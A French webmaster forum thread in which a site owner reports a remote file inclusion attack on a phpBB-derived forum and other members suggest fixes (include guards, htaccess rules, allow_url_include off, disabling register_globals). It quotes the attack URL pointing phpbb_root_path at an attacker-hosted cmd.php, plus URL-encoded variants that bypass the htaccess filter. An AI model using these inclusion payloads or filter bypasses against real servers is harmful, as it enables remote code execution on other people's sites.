[RESOLU] Faille de sécurité PHPBB
11 messages • Page 1 sur 1
Consultez la formation à Google Analytics de WebRankInfo / Ranking Metrics
[RESOLU] Faille de sécurité PHPBB
Salut
Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):
Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451
ou ici:
http://secwatch.org/advisories/1015365/
Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?
Merci d'avance des suggestions et correctifs...
Bon, j'ai été attacké cette nuit donc je fais partager et les solutions de sécurité sont les bienvenues. Voila ce qui s'est passé (c'est déja documenté sur le net):
- Code: Tout sélectionner
Arbitrary File Inclusion:
http://[target]/includes/functions.php?phpbb_root_path=http://[attacker]/cmd.php
Documenté ici :
http://www.frsirt.com/english/advisories/2007/0451
ou ici:
http://secwatch.org/advisories/1015365/
Donc j'ai tourné url_fopen off dans php afin que cette vulnérabilité ne puisse etre utilisée. Ceci dit, ca me gene sur d'autres aspecs du site, donc toute solution de sécurisation serait la bienvenue...Par exemple checker la valeur retour et interdire si elle commence par http ?? Dans quels fichier ?
Merci d'avance des suggestions et correctifs...
Dernière édition par EasyExpat le Ven Juin 20, 2008 13:59, édité 1 fois.
- Code: Tout sélectionner
if ( !defined('IN_PHPBB') && !defined('IN_PORTAL') ) {
die('Hacking attempt');
exit;
}
Au début des fichiers de ce genre évite les inclusions comme cela
loran750 a écrit:Euh ...
1/ ça date de 2007
2/ ça ne concerne pas PhpBB mais un clode nommé PhpBB XS (renommé depuis en Icy Phoenix).
Donc rien à voir avec PhpBB !
Il se trouve seulement que la faille est a plusieurs niveaux. Tu veux que j'essaye sur ton forum
darkjukka> Mais il y a cette protection dans le code PHPBB au niveau du fichier common.php deja:
- Code: Tout sélectionner
if ( !defined('IN_PHPBB') )
{
die("Hacking attempt");
}
-

webmasterlamogere - WRInaute accro

- Messages: 1874
- Inscription: Dim Déc 17, 2006 21:08
il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html
c'est à cause de register_globals à on
c'est à cause de register_globals à on
webmasterlamogere a écrit:c'est à cause de register_globals à on
Je sais
webmasterlamogere a écrit:il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html
Bon c'est super ca !! Merci
EasyExpat a écrit:webmasterlamogere a écrit:il y a la solution htaccess pour bloquer : http://www.urlrewriting.fr/scripts58-Snipets.html
Bon c'est super ca !! Merci
2 remarques :
- il manque "RewriteEngine On" juste au début (pas évident pour qqun qui débute)
- cette protection est inefficace :
http://[target]/?phpbb_root_path=%68ttp://[attacker]
ou
http://[target]/?phpbb_root_path=htt%70://[attacker]
passe quand meme
Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.
Par contre cette option n'est disponible que depuis PHP 5.2.
PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...
- Code: Tout sélectionner
; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
allow_url_include = Off
Par contre cette option n'est disponible que depuis PHP 5.2.
PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...
Bool a écrit:Au lieu de désactiver l'URL fopen qui en lui même ne pose pas vraiment de problème, il est préférable de désactiver l'URL include qui lui ne rime à rien.
Par contre cette option n'est disponible que depuis PHP 5.2.
PS : mais ça n'empêche pas de désactiver le register_globals et de corriger les failles...
Merci
En ce qui concerne la remarque sur le register_globals, je sais, c'est dans la TODO list :-p
11 messages • Page 1 sur 1
Formation recommandée sur ce thème :
Formation Google Analytics : en 2 jours, apprenez comment exploiter l'essentiel des possibilités de l'outil de mesure d'audience de Google. Formation animée par Julien Coquet, expert certifié officiellement par Google Analytics.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- 1ère faille de sécurité découverte sur Google Chrome
- Optimiser le référencement d'un forum phpBB : réécriture d'URL
- Faille de sécurité dans la Google Toolbar
- Nouvelle faille qui touche de nombreux services de Google
- Référencement d'un forum phpBB
- Passage à l'heure d'été/hiver sur un forum phpBB
- Google rachète Postini, spécialiste de la sécurité Internet
- Google ouvre un blog sur la sécurité informatique en ligne
- Robots.txt : Yahoo supporte les options avancées
- Les statistiques de Google Sitemaps
- Faille de securité Adword!!!!!!!
- Faille de sécurité sur Adsense ???
- Faille de securite chez Google
- Faille securite sur spip
- [php] Faille de sécurité include()
- Faille de sécurité IE6 XP SP1
- Faille de sécurité dans SPIP v<1.7
- multi-ftp d'ovh = faille de sécurité?
- Faille de sécurité Apache découverte, m-à-j à appliquer.
- Faille de sécurité sur Google Desktop
- [forum] punbb - phpbb et la sécurité ?
- (résolu) phpbb et variables globales
- [Resolu]Probleme installation forum PHPBB
- [résolu] Utiliser login.php de phpbb
- [résolu] Modification sur script phpBB
Qui est en ligne
Utilisateurs parcourant ce forum: Aucun utilisateur enregistré et 2 invités





le forum